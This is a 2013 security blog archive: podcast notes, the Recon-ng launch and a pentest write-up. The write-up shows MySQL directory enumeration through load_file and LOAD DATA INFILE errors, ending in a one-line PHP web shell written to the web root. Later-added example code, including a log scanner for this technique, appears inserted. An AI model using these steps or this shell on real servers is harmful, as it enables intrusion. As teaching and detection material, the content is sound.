January 2013 Archives
After playing a little "Five Questions with PaulDotCom" (three, sir!) with tech segment guest Alissa Torres, Paul started off with a quote from Dr. Dan Geer that the guys basically resolved down to "Who cares about security?" Geer's quote is: "When those that can make the changes to improve security are not those that impacted by the effect of poor security, you will basically get status quo and no security improvement." or as Jack puts it, if my decisions on security don't bite me in the ass, I'm probably not going to make the best possible decisions. They also took this into the area of application security and who cares about it there. First, we have the developers who are being paid to write code and get the software out the door. Then we have the company paying the developers. Their concern is getting the software out the door and selling it. Then we have the customers who purchase the software and just want it to work. Where are the security decisions in this cycle?
Google also seems to have added a new feature. In Google Images, you'll now see a camera icon to the right of the search bar. If you enter a URL to an image or upload an image, Google will find all the places where that image has been used. Somewhere, Manti Te'o screams "Where were you when I needed you three years ago, Google!!"
So Barracuda Networks has a wide-open back door to their device. It's always kind of funny, in a bad way, when security companies have poor security practices in place. It's another example of "do as we say, not as we do". A researcher was able to find that he could connect to the device's MySQL database with a username of "product" and no password! C'mon man! At a minimum, put a password on the thing. Even if it is shared internally within Barracuda, that's at least a little bit better. As Jack talked about from his days supporting customers on products, it's understandable to have some sort of back door. Customers do sometimes lock themselves out and not keep backups. So when that happens, what do you tell an angry customer who has paid you thousands of dollars? "Oh sorry, you were dumb. You're screwed." No, that's not going to fly. So vendors do put in a back door. But if you're going to have a master key to all the systems, don't make it so easy to get in to.
Cisco responds to the WRT54GL Linksys router hack. They're working on a fix for people being able to remotely get a root shell, but their recommendation in the meantime? Only let friends use your router. Oh yeah, with friends like these...
Have you signed up for the SANS webinar titled "Uninstall Java? Realistic Recommendation? No. Insanity? Yes!" with John Strand, Paul Asadoorian and Eric Conrad? It's coming up, this Tuesday at 2 pm EST.
Do you have all the HTTP response codes memorized? Someone is proposing a new range of 700-level codes. Some that might be helpful: HTTP 725: It Works On My Machine. And I fear how often the PaulDotCom web server will return an HTTP 767. It simply reads "Drunk".
Former Dawson College student Ahmed Al-Khabaz, who was expelled for allegedly hacking the university's infrastructure, has received multiple job offers. The guys talk about the situation in a little more detail than is often reported. He found a vulnerability and reported it. So far, so good. But then a little while later, he pointed a scanner at the vulnerability that he found, presumably setting off alarms. Even worse, the noise from the scanner pointed back to him. Once he reported the vulnerability, what's he doing going back to it, and as "evil" Jack mentions, why didn't Al-Khabaz cover his tracks better when he switched his hat color? Nonetheless, lots of weirdness abounds in this story. The university overreacted (what?!? a university overreacted? never!) instead of using this as a learning opportunity. Plus, the student may have made some mistakes along the way, yet he comes out better for it. So is the lesson here to hack your way to a job? Is that what universities are for? Umm, no. Never go after something that you don't have explicit, written permission to hack. Plus there's Paul's suggestion of punishment here: the student should have been required to work the help desk for three months. That's enough to teach anyone a good lesson.
That's it for this week. Watch the video for these stories and more!
Alissa Torres is a certified SANS Instructor and Incident Handler at Mandiant, finding evil on a daily basis. Alissa began her career in information security as a Communications Officer in the United States Marine Corps and is a graduate of University of Virginia and University of Maryland. She's on tonight to talk to us about Bulk Extractor.
At Derbycon and Hack3rCon this year, I gave talks that discussed ways of automating reconnaissance so that it doesn't have to be something penetration testers neglect due to time constraints. During those talks, I mentioned the possibility of a framework, but only released a script which automated some of the techniques that were discussed. Well, since DerbyCon, I have been hard at work developing the aforementioned framework, and now I am happy to announce the release of the Recon-ng reconnaissance framework.
Recon-ng is a true framework whose interface is modeled after the very popular and powerful Metasploit Framework. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng was built to feel like the Metasploit Framework in order to reduce the learning curve for leveraging the framework. However, Recon-ng is quite different. First and foremost, Recon-ng is written completely in Python. Finally! A framework written in Python! Now, developers and penetration testers who prefer to work in Python have an open source framework to which they can contribute. Another difference is Recon-ng's purpose. Recon-ng is not intended to compete with any existing framework, as it was designed exclusively for web-based reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!
Recon-ng is a completely modular framework. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done for you. Building modules is simple and takes little more than a few minutes. While tasks such as making web requests can be done manually from within a module, there are benefits to using the prebuilt interfaces and convenience functions. For example, there are global settings in the framework which allow the user to specify a custom User-Agent string or enable proxying of requests. These global settings are applied only to requests that go through the prebuilt interface; a module that makes its own requests by hand does not pick them up.
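To make the module pattern above concrete, here is an added illustration built on Python's standard "cmd" module. It is not Recon-ng's own source: the class names, the "set" command, the option names and the example.test endpoint are all assumptions. The point it demonstrates is the last sentence of the paragraph: a request built through the base class's prebuilt interface carries the global User-Agent and proxy settings, while a request the module hand-rolls does not.

```python
"""Minimal cmd-based framework with global options and a prebuilt request
interface. Added example, not Recon-ng code; names are assumed."""
import cmd
import urllib.request

# Global settings shared by every module (assumed option names).
DEFAULT_OPTIONS = {"user-agent": "example-recon/0.1", "proxy": ""}


class Framework(cmd.Cmd):
    """Base interpreter: every module inherits the options and the helpers."""
    prompt = "recon > "

    def __init__(self):
        super().__init__()
        self.options = dict(DEFAULT_OPTIONS)

    def do_set(self, line):
        """set <option> <value>: change a global option (user-agent, proxy)."""
        name, _, value = line.partition(" ")
        if name.lower() not in self.options:
            print("unknown option: %s" % name)
            return
        self.options[name.lower()] = value.strip()

    def do_exit(self, line):
        """exit: leave the interpreter."""
        return True

    def build_request(self, url, headers=None):
        """Prebuilt interface: a urllib Request that carries the global User-Agent."""
        hdrs = {"User-Agent": self.options["user-agent"]}
        hdrs.update(headers or {})
        return urllib.request.Request(url, headers=hdrs)

    def build_opener(self):
        """Prebuilt interface: an opener routed through the global proxy, if set."""
        handlers = []
        if self.options["proxy"]:
            proxies = {"http": self.options["proxy"], "https": self.options["proxy"]}
            handlers.append(urllib.request.ProxyHandler(proxies))
        return urllib.request.build_opener(*handlers)


class HostLookupModule(Framework):
    """A module adds only what is specific to its task; plumbing is inherited."""
    prompt = "recon [host_lookup] > "
    ENDPOINT = "http://example.test/lookup?domain=%s"  # hypothetical; nothing is sent

    def prepare(self, domain, use_prebuilt=True):
        """Return the Request that 'run' would send. With use_prebuilt=False the
        module bypasses the framework, so the global settings no longer apply."""
        url = self.ENDPOINT % domain
        if use_prebuilt:
            return self.build_request(url)
        return urllib.request.Request(url)  # hand-rolled: no global User-Agent

    def do_run(self, line):
        """run <domain>: show the request this module would send."""
        req = self.prepare(line.strip() or "example.test")
        print("%s %s (User-Agent: %s)" % (req.get_method(), req.full_url,
                                          req.get_header("User-agent")))


if __name__ == "__main__":
    HostLookupModule().cmdloop()
```

Running the block drops you into the interpreter; "set user-agent Mozilla/5.0" followed by "run example.test" shows the header change, whereas a module calling urllib directly would print None for the User-Agent no matter what was set.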
Recon-ng comes packaged with many modules and is well equipped to begin supporting your reconnaissance efforts immediately. Here is some information about the included modules, according to module type.
Auxiliary modules enhance the information that has already been stored in the database. The included modules look for known information leakage pages on hosts, conduct reverse lookups of hashed credentials, mangle names into usernames and email addresses, check whether or not an email address has been associated with a public credentials leak, and resolve hostnames to IP addresses.
Contacts modules harvest information about people that are associated with a given company and store it in the database. The included modules leverage LinkedIn and Jigsaw to harvest full names and job titles. The information gathered from the Contacts modules can be manipulated with the Auxiliary modules and used in conjunction with the Social Engineer Toolkit to produce devastating results. Recon-ng + SET, a match made in heaven.
Hosts modules harvest hosts that are associated with a given domain and store them in the database. The included modules leverage the Baidu, Bing, Google, Shodan, and Yahoo search engines to enumerate internet-aware hosts, and leverage DNS to brute-force guess hostnames. The hosts gathered with the Hosts modules can assist penetration testers during the scoping process. They can also be used in conjunction with Auxiliary modules to identify known information leakage pages that contain active session IDs and authentication credentials.
Output modules create usable forms of the data stored in the database. The included modules provide the ability to create CSV and HTML reports. Whether you are looking to move data from Recon-ng to Excel, or create an appendix for a deliverable, we've got you covered.
Recon-ng was not designed to deliver shell, but what if I told you that you could gain authenticated access to an environment without sending a packet to the target network or application? Pwnedlist modules leverage the Pwnedlist.com API to retrieve full credentials of "pwned" user accounts. The included modules retrieve single account credentials, credentials for all "pwned" accounts within a domain, or information about known leaks. Imagine having multiple sets of legitimate credentials for a VPN or web application prior to a penetration test even beginning. That's power that simply cannot be denied.
So there you have it. The Recon-ng framework. The repository is located here and the Usage and Development Guides are located on the wiki here. Clone it, use it, love it, fork it, and contribute to it. I do not consider myself a "true" developer, but I love to code, so I gave it my best shot. I welcome any and all expertise in improving the project and making it more useful to the community. Enjoy!
Join me for SEC542: Web App Penetration Testing and Ethical Hacking at SANS Monterey 2013!
Monterey, CA | Fri Mar 22 - Wed Mar 27, 2013
On January 12, 2013, the Department of Homeland Security recommended that organizations stop using Java and uninstall it throughout their environments. The problem is, many organizations use Java as a regular, if not critical, part of their IT infrastructure. Sadly, it is the #1 language used in application development, with over 28% of all programs currently running within organizations. So Java is everywhere throughout our infrastructures and we are simply recommending to uninstall it? Sure, over the past few weeks there have been more than a few new 0-days for Java, but, as infosec pros, we need to come up with better recommendations than simply uninstalling an app that is required by so many.
Every time we say things like "Don't use IE!! Uninstall Adobe Acrobat!! Uninstall Java!!" we get a little further down the path of total irrelevance to management and the rest of the IT community. So, to combat this, we are going to be doing the first in a monthly series of webcasts.
In this webcast we will be covering a number of ways to secure Java in your environment. From different web filtering tricks to some pretty cool GPO kung-fu from Carlos. Rather than simply saying uninstall Java we are going to do our best to provide you with mitigating controls to manage risk, rather than pretend it can be eliminated.
This webcast will be this Tuesday the 29th at 2 PM EST. Check it out here.
See you then.
Paul also got a little worked up over an article where the author compared selling vulnerabilities to shooting someone with a gun. In the article, the quote: "If I take a gun and ship it overseas to some guy in the Middle East and he uses it to go after American troops - it's the same concept." About the only thing this quote does is jump on the current hysteria surrounding guns. Why not say selling vulnerabilities is the same thing as Kim and Kanye having a baby? It's the same thing as a guy taking drugs so he can pedal a bicycle faster? It's about as accurate. If you get shot with a gun, every single human is going to get hurt or worse. That's just a fact of nature. However, a 0day vulnerability is either harmless or would not even exist in the first place if developers started writing better code. If you don't ever interact with any Java code, a Java 0day will not affect you. So no, guns and computer vulnerabilities are not the same thing.
The guys also talked about a couple of researchers and how they were able to fuzz the remote authentication system of a hospital x-ray machine and then get access to anything they wanted. Like the previous demonstrations that showed you can hack an insulin pump or even someone's pacemaker, this shows that the medical and medical device field has a long way to go toward incorporating a security mindset.
Want to make a little cash on the side and have some familiarity with hacking Adobe products or Internet Explorer? A bug bounty program is offering $7,000 for new vulnerabilities on each. Have at it.
Lastly, this was probably our favorite story of the week, and it explains why it's a good idea to proactively check your logs. According to the Verizon Risk Team Security Report, one company checked their logs and found a long-term and frequent open VPN connection to China. At first, they believed someone was infected with malware, as the connection was always to the same machine. However, upon further investigation, there was no malware. The connection was intentional. One of their employees had found a way to outsource his own job to China! Instead of developing code, he'd do some shopping on eBay, some status updates on Facebook and enjoy cat videos. However, a couple of other ironies stuck out about this guy. He was frequently commended for writing great, clean code and completing projects in a very timely manner. He was seen as one of the best employees in the firm. Additionally, he was able to defeat his company's two-factor authentication requirement by sending his RSA token to China via FedEx. Our take on this? This man clearly needs to be promoted to management. He has some serious management potential.
And if you've made it this far, as we talked about on the show, please follow Jack Daniel on twitter for some daily enlightenment.
The scenario goes like this. I found a Windows 7 machine running a MySQL database configured with a username of "root" and a password of "root". In my experience, when a default configuration like this is found, the database usually ends up being empty and unused, hence the neglect. As was the case here. Since MySQL doesn't have native ability to run system commands through the database, many penetration testers walk away at this point. However, MySQL access can be used to do so much more. With functions such as "load_file", "INTO OUTFILE", and "INTO DUMPFILE", we can interact with the local file system even though we can't run commands. If we're lucky, the vulnerable server is also running a web server with some sort of server side technology (PHP, .NET, JSP, etc.) so we can use the aforementioned functions to write a web shell to the web server and launch it through a browser.
In this scenario, the server was also running Apache and PHP, the perfect combination for compromise. But this is where things get interesting. Where do you write the web shell? The document root, right? Well, where is the document root? While the default location is usually a good place to start, it wasn't that easy this time. As it turns out, the target was a proprietary server, configured by the vendor for a specific purpose. When something like this happens, you have 2 options for finding the document root: try to guess the document root, or find the configuration file for the web server that tells you where the document root is. I typically elect to look for the configuration file, as document roots are more likely to be customized during configuration than the server install location itself. This is where the challenge began. The default web server install location had been changed as well. I had to find another way. And this is when I stumbled upon a way to use MySQL to enumerate the directory structure. Check it out.
The MySQL "load_file" function gives a database user the ability to load files from the file system into a table, or dump them to the screen. If the given path exists, it works. If the given path doesn't exist, it fails and reports a database error. So how does this help us find directories? Well, what happens when we try to "load_file" a directory instead of a file? This is where it gets neat. When you attempt to load a directory that isn't there, you get the expected response: an error similar to the one you get when a given file doesn't exist.
mysql> SELECT load_file("C:/file_does_not_exist.txt");
ERROR 13 (HY000): Can't get stat of 'C:\file_does_not_exist.txt' (Errcode: 2)
mysql> SELECT load_file("C:/dir_does_not_exist");
ERROR 13 (HY000): Can't get stat of 'C:\dir_does_not_exist' (Errcode: 2)
However, when the directory does exist, the path is legit, but there isn't any file content for MySQL to return, so we get back a NULL.
mysql> SELECT load_file("C:/");
+------------------+
| load_file("C:/") |
+------------------+
| NULL             |
+------------------+
1 row in set (0.20 sec)
So we have a positive vs. negative response we can use to enumerate directories. At this point it is a little like "Dirbusting". We can guess, discover, guess again, and continue digging until we find what we are looking for, in this case the Apache "httpd.conf" file.
I was able to enumerate the "Program Files" and "Program Files (x86)" directories (validating that it was a 64-bit OS, something that might come in handy later). Since the server response header was "Apache 2.X.X (Win32)", I assumed x86 and began enumerating that directory tree. I tried the typical "Apache Software Foundation" directory next, as that is the default install path for modern versions of Apache. It was not there. After digging and guessing for a while, I shared my frustration with Tim Medin. He recommended I try using the "8.3" abbreviation for the directory name. Doh! Why didn't I think of that!? It worked beautifully.
mysql> SELECT load_file("C:/Program Files (x86)/Apache Software Foundation");
ERROR 13 (HY000): Can't get stat of 'C:\Program Files (x86)\Apache Software Foundation' (Errcode: 2)
mysql> SELECT load_file("C:/Program Files (x86)/Apache~1");
+----------------------------------------------+
| load_file("C:/Program Files (x86)/Apache~1") |
+----------------------------------------------+
| NULL                                         |
+----------------------------------------------+
1 row in set (0.19 sec)
From then on it was trial and error until I reached the "httpd.conf" file. I pulled it down from the server, enumerated the document root location from it, used the "INTO OUTFILE" function to write a simple PHP web shell to the document root, and shell was had.
mysql> SELECT load_file("C:/Program Files (x86)/Apache~1/Apache2/conf");
+-----------------------------------------------------------+
| load_file("C:/Program Files (x86)/Apache~1/Apache2/conf") |
+-----------------------------------------------------------+
| NULL                                                      |
+-----------------------------------------------------------+
1 row in set (0.17 sec)
mysql> SELECT load_file("C:/Program Files (x86)/Apache~1/Apache2/conf/httpd.conf");
<omit>
mysql> SELECT "<? passthru($_REQUEST['cmd']); ?>" INTO OUTFILE "C:/Program Files (x86)/<omit>/<omit>/htdocs/shell.php";
Query OK, 1 row affected (0.20 sec)
I know Carlos, this was only the beginning.
While this isn't a ground breaking hack, it is a pretty cool way to use something that MySQL gives you to your advantage before walking away from a MySQL server for which you have credentials or SQL Injection. As always, enjoy!
Update 01/18/13 12:45pm
After a few emails this morning and reports of the technique not working in some versions of MySQL, I conducted some deeper testing of multiple MySQL servers. As it turns out, the above appears to be a bug that only existed in very old versions of MySQL. The version I was dealing with was 4.1.7. Therefore, to leverage the above technique, we are restricted to older versions of MySQL. Versions that we likely won't see often. Bummer. But there is some good news. I was talking about this with Tim Medin again, and he asked if I had tried using the "LOAD DATA INFILE" directive to do the same thing. I had not at the time, but immediately went to testing. I am happy to report that we now have an alternative for enumerating file system paths with newer versions of MySQL.
The "LOAD DATA INFILE" directive allows the database user to load a file from the file system directly into a table in the database. While this is similar to the "load_file" function, it does not allow us to output to the screen. Bummer, but it still works. The first thing you have to do is either create a new table to test with, or select one that you don't mind poisoning from the existing database. Once you do that, the process is very similar to what we did before.
Create a Table:
mysql> create table temp (id integer);
Query OK, 0 rows affected (0.01 sec)
File Fail:
mysql> LOAD DATA INFILE 'c:/windows/system32/drivers/etc/hostcds' INTO TABLE mysql.user;
ERROR 29 (HY000): File 'c:\windows\system32\drivers\etc\hostcds' not found (Errcode: 2)
File Success:
mysql> LOAD DATA INFILE 'c:/windows/system32/drivers/etc/hosts' INTO TABLE mysql.user;
ERROR 1261 (01000): Row 1 doesn't contain data for all columns
Dir Fail:
mysql> LOAD DATA INFILE 'c:/windows/system32/drivers/etccd' INTO TABLE mysql.user;
ERROR 29 (HY000): File 'c:\windows\system32\drivers\etccd' not found (Errcode: 2)
Dir Success:
mysql> LOAD DATA INFILE 'c:/windows/system32/drivers/etc' INTO TABLE mysql.user;
ERROR 29 (HY000): File 'c:\windows\system32\drivers\etc' not found (Errcode: 13)
File Fail:
mysql> LOAD DATA INFILE '/etc/passwdblah' INTO TABLE mysql.user;
ERROR 13 (HY000): Can't get stat of '/etc/passwdblah' (Errcode: 2)
File Success:
mysql> LOAD DATA INFILE '/etc/passwd' INTO TABLE mysql.user;
ERROR 1062 (23000): Duplicate entry '##-' for key 'PRIMARY'
Dir Fail:
mysql> LOAD DATA INFILE '/etc/apache' INTO TABLE mysql.user;
ERROR 13 (HY000): Can't get stat of '/etc/apache' (Errcode: 2)
Dir Success:
mysql> LOAD DATA INFILE '/etc/apache2' INTO TABLE mysql.user;
ERROR 1085 (HY000): The file '/private/etc/apache2' must be in the database directory or be readable by all
As you can see, we still have differences in the responses from the server to work with. On Windows, it can be as subtle as a difference in the Errcode (2 for a missing path versus 13 for a directory that exists). On Linux, it's a more obvious error statement. These tests were performed against Windows MySQL 5.5.29 and Linux MySQL 5.5.25.
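From the defender's side, both variants of the technique (the original "load_file" probing and the "LOAD DATA INFILE" alternative from the update) leave the same footprint: one database connection issuing a burst of file-touching statements against distinct paths, most of which fail, sometimes ending with an "INTO OUTFILE" write of a script file. The following is an added example, not code from the original post, that looks for that footprint in MySQL's general query log. The log layout it parses is the "YYMMDD HH:MM:SS  <thread id> Query <sql>" format of the 5.x general log, and the sample lines are constructed to mirror the sessions shown above; the threshold of five distinct paths is an assumption to tune per environment.

```python
"""Flag file-system probing via load_file()/LOAD DATA INFILE/INTO OUTFILE in a
MySQL general query log. Added example; log lines below are constructed."""
import re
from collections import defaultdict

# Clauses that reach the server's file system; exactly one of groups 1-3 holds the path.
FILE_STMT = re.compile(r"""(?ix)
    load_file\s*\(\s*["']([^"']+)["']\s*\)
  | LOAD\s+DATA\s+(?:LOCAL\s+)?INFILE\s+["']([^"']+)["']
  | INTO\s+(?:OUT|DUMP)FILE\s+["']([^"']+)["']
""")

# General log line: the timestamp is omitted on lines within the same second,
# so it is optional; the thread id identifies the connection.
LOG_LINE = re.compile(r"^(?:\d{6}\s+\d\d:\d\d:\d\d)?\s*(\d+)\s+Query\s+(.*)$")

# A file with one of these extensions written via OUTFILE/DUMPFILE is a web-shell signal.
SCRIPT_EXT = (".php", ".jsp", ".asp", ".aspx", ".cgi", ".pl", ".py")

# Constructed sample, modelled on the sessions in the post (thread 3 is the probe).
SAMPLE_LOG = """\
130117 12:00:01     3 Connect   root@localhost on
130117 12:00:02     3 Query     SELECT load_file("C:/file_does_not_exist.txt")
130117 12:00:03     3 Query     SELECT load_file("C:/")
130117 12:00:04     3 Query     SELECT load_file("C:/Program Files (x86)/Apache Software Foundation")
130117 12:00:05     3 Query     SELECT load_file("C:/Program Files (x86)/Apache~1")
130117 12:00:06     3 Query     LOAD DATA INFILE 'C:/Program Files (x86)/Apache~1/Apache2/conf' INTO TABLE temp
130117 12:00:07     3 Query     SELECT '<omit>' INTO OUTFILE "C:/Program Files (x86)/Apache~1/Apache2/htdocs/shell.php"
130117 12:00:08     4 Query     SELECT id, name FROM customers WHERE id = 42
130117 12:00:09     5 Query     LOAD DATA INFILE '/var/lib/mysql-files/import.csv' INTO TABLE imports
""".splitlines()


def extract_paths(sql):
    """Return the file-system paths referenced by file-touching clauses in one statement."""
    return [next(g for g in m.groups() if g) for m in FILE_STMT.finditer(sql)]


def scan_general_log(lines, probe_threshold=5):
    """Return alerts: a 'script_write' for each OUTFILE/DUMPFILE write of a script
    file (in log order), then a 'path_probe' for each connection that referenced
    at least probe_threshold distinct paths."""
    paths_by_conn = defaultdict(set)
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # connect/quit records and continuation noise
        conn, sql = m.group(1), m.group(2)
        for stmt in FILE_STMT.finditer(sql):
            path = next(g for g in stmt.groups() if g)
            paths_by_conn[conn].add(path)
            if stmt.group(3) and path.lower().endswith(SCRIPT_EXT):
                alerts.append({"conn": conn, "type": "script_write", "path": path})
    for conn, paths in paths_by_conn.items():
        if len(paths) >= probe_threshold:
            alerts.append({"conn": conn, "type": "path_probe", "count": len(paths)})
    return alerts


if __name__ == "__main__":
    for alert in scan_general_log(SAMPLE_LOG):
        print(alert)
```

The general log is off by default (general_log=ON enables it) and is verbose, so in practice you would feed this the lines for the database accounts that hold the FILE privilege; a single low-privilege "root/root" install as in the scenario above is exactly the account that should never have it. Setting secure_file_priv to a dedicated directory also confines all three clauses to that directory, which removes the enumeration signal and the OUTFILE write in one move.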
Gene and Josh talk about burnout in the infosec industry and what's being done about it. Plus Gene has a new book released that's getting rave reviews: "The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win"
Hacking x-ray machines, comparing vulnerabilities to gun violence, unplugging java from a browser (in Paul's experience), making good money on bug bounties from IE and Adobe, condoms, castles, blaming PSY for additional Korean hacks and the best innovation story that we've heard in a while. Meow.
Join us for a talk on InfoSec Burnout on Episode 316 with Gene Kim, author of the recently released "The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win" and Josh Corman, Director of Security Intelligence at Akamai Technologies. Sit back and enjoy the show live or participate in the live chat on our Ustream channel:
NOTE: The video will play the most recent show up until we are live!
A review of Gene Kim, Kevin Behr & George Spafford's "The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win" .
The Phoenix Project should be on every entrepreneur's reading list and is a C-level executive's "Aesop's Fable on why IT matters". The book bills itself as "A Novel About IT, DevOps, and Helping Your Business Win", but its message is more fundamental: a business cannot succeed when its IT fails.
The Phoenix Project has a convincing and captivating style. So much so that I found myself at times transported back into the office via the experiences of the book's protagonist, Bill Palmer. Bill is the fictional Director of Midrange Technology Operations at an automotive parts company named "Parts Unlimited". He's a former military man who wants to do the right thing for himself, his family, and his co-workers. We catch up with him at the moment when his career is given an unexpected boost: he is called into the CEO's office and "voluntold" (a brilliant term popularized by PaulDotCom's Jack Daniel) to shepherd the life-saving project of the company, dubbed "Project Phoenix", to successful implementation. Bill is given what is essentially an opportunity to not just fail, but fail spectacularly. He's constantly fighting the battles many IT departments face: poor planning, rushed implementations, an adversarial relationship with both Security and Auditing, as well as project managers who demand their specific pet projects be everyone's main priority. Except now he's being promoted to VP of IT Operations after the last CIO and VP have been removed, putting himself in the line of fire.
While I am nowhere near a position of responsibility such as Bill's, I could completely identify with his feelings as he worked through one outage after another: frustrated, tired and annoyed at dealing with a completely avoidable problem. During the course of the book, Bill is thrown into various emergencies and IT catastrophes, only to ask himself "How did things get so out of control?" Fortunately, just like the PaulDotCom crew's favorite martial arts tales, Bill (and the reader) is shown down the path to enlightenment via the "Three Ways" by a quirky, rude and mysterious 'master' named Erik Reid.
Erik describes the Three Ways as follows:
"The First Way helps us understand how to create fast flow of work as it moves from Development into IT Operations, because that's what's between the business and the customer. The Second Way shows us how to shorten and amplify feedback loops, so we can fix quality at the source and avoid rework. And the Third Way shows us how to create a culture that simultaneously fosters experimentation, learning from failure, and understanding that repetition and practice are the prerequisites to mastery."
However, before Bill can learn the Three Ways, Erik puts Bill on the path to breaking the constant cycle of Reactive IT with a simple question: "[What] exactly, is your definition of 'work?'" It's a question that Bill initially struggles with, but is the key to his voyage of self-discovery. Bill moves through various obstacles in the book towards learning the Three Ways and the book does a great job of showcasing typical scenarios many IT workers find themselves in and how the Three Ways can keep projects and work from becoming unmanageable.
Having recently read "Visible Ops Security" by two of the three authors of "The Phoenix Project", I came away with a more comprehensive appreciation of the Visible Ops' lessons after finishing the novel. Via the book, I took the journey along with Bill, rather than feeling like I had been lectured. If you feel that your IT operations are a constant treadmill of poor planning and hurried execution, The Phoenix Project is an enjoyable 330 pages that shows us how to turn our shops from Reactive IT to helping the business win. To hear more on this topic and get more info on the book, be sure to catch Gene on Episode 316 of PaulDotCom Security Weekly at 6PM this Thursday January 17th!
This is an awesome interview with Kati Rodzon and Mike Murray from MAD Security about the psychology behind social engineering engagements. Kati and Mike talk about the importance of confidence and playing a role.
Here is our newest intern's first project, presenting on Cross-Site Request Forgery. We apologize, the audio cuts out when the video cuts to the computer screen. But there is the text explanation on the show notes page, linked below.
Safe sexting, Facebook password disclosure ban, Apple causes increased crime in NYC, the Defcon documentary preview, IE 0day, Turktrust, 94% of healthcare breached, RoR vulnerable to SQLi, finding source code in version control
In this episode we discuss Facebook and IE vulnerabilities. We talk about cool Active Defense tricks and I get all up in the grill of infosec pros who recommend not using software like Java and IE to their customers.
Links for this episode:
Dr. Cole is a SANS instructor and author of several books including Hackers Beware, Hiding in Plain Sight, Network Security Bible, and Insider Threat. Plus he recently released Advanced Persistent Threat (drink!).
Episode 314 (mp3)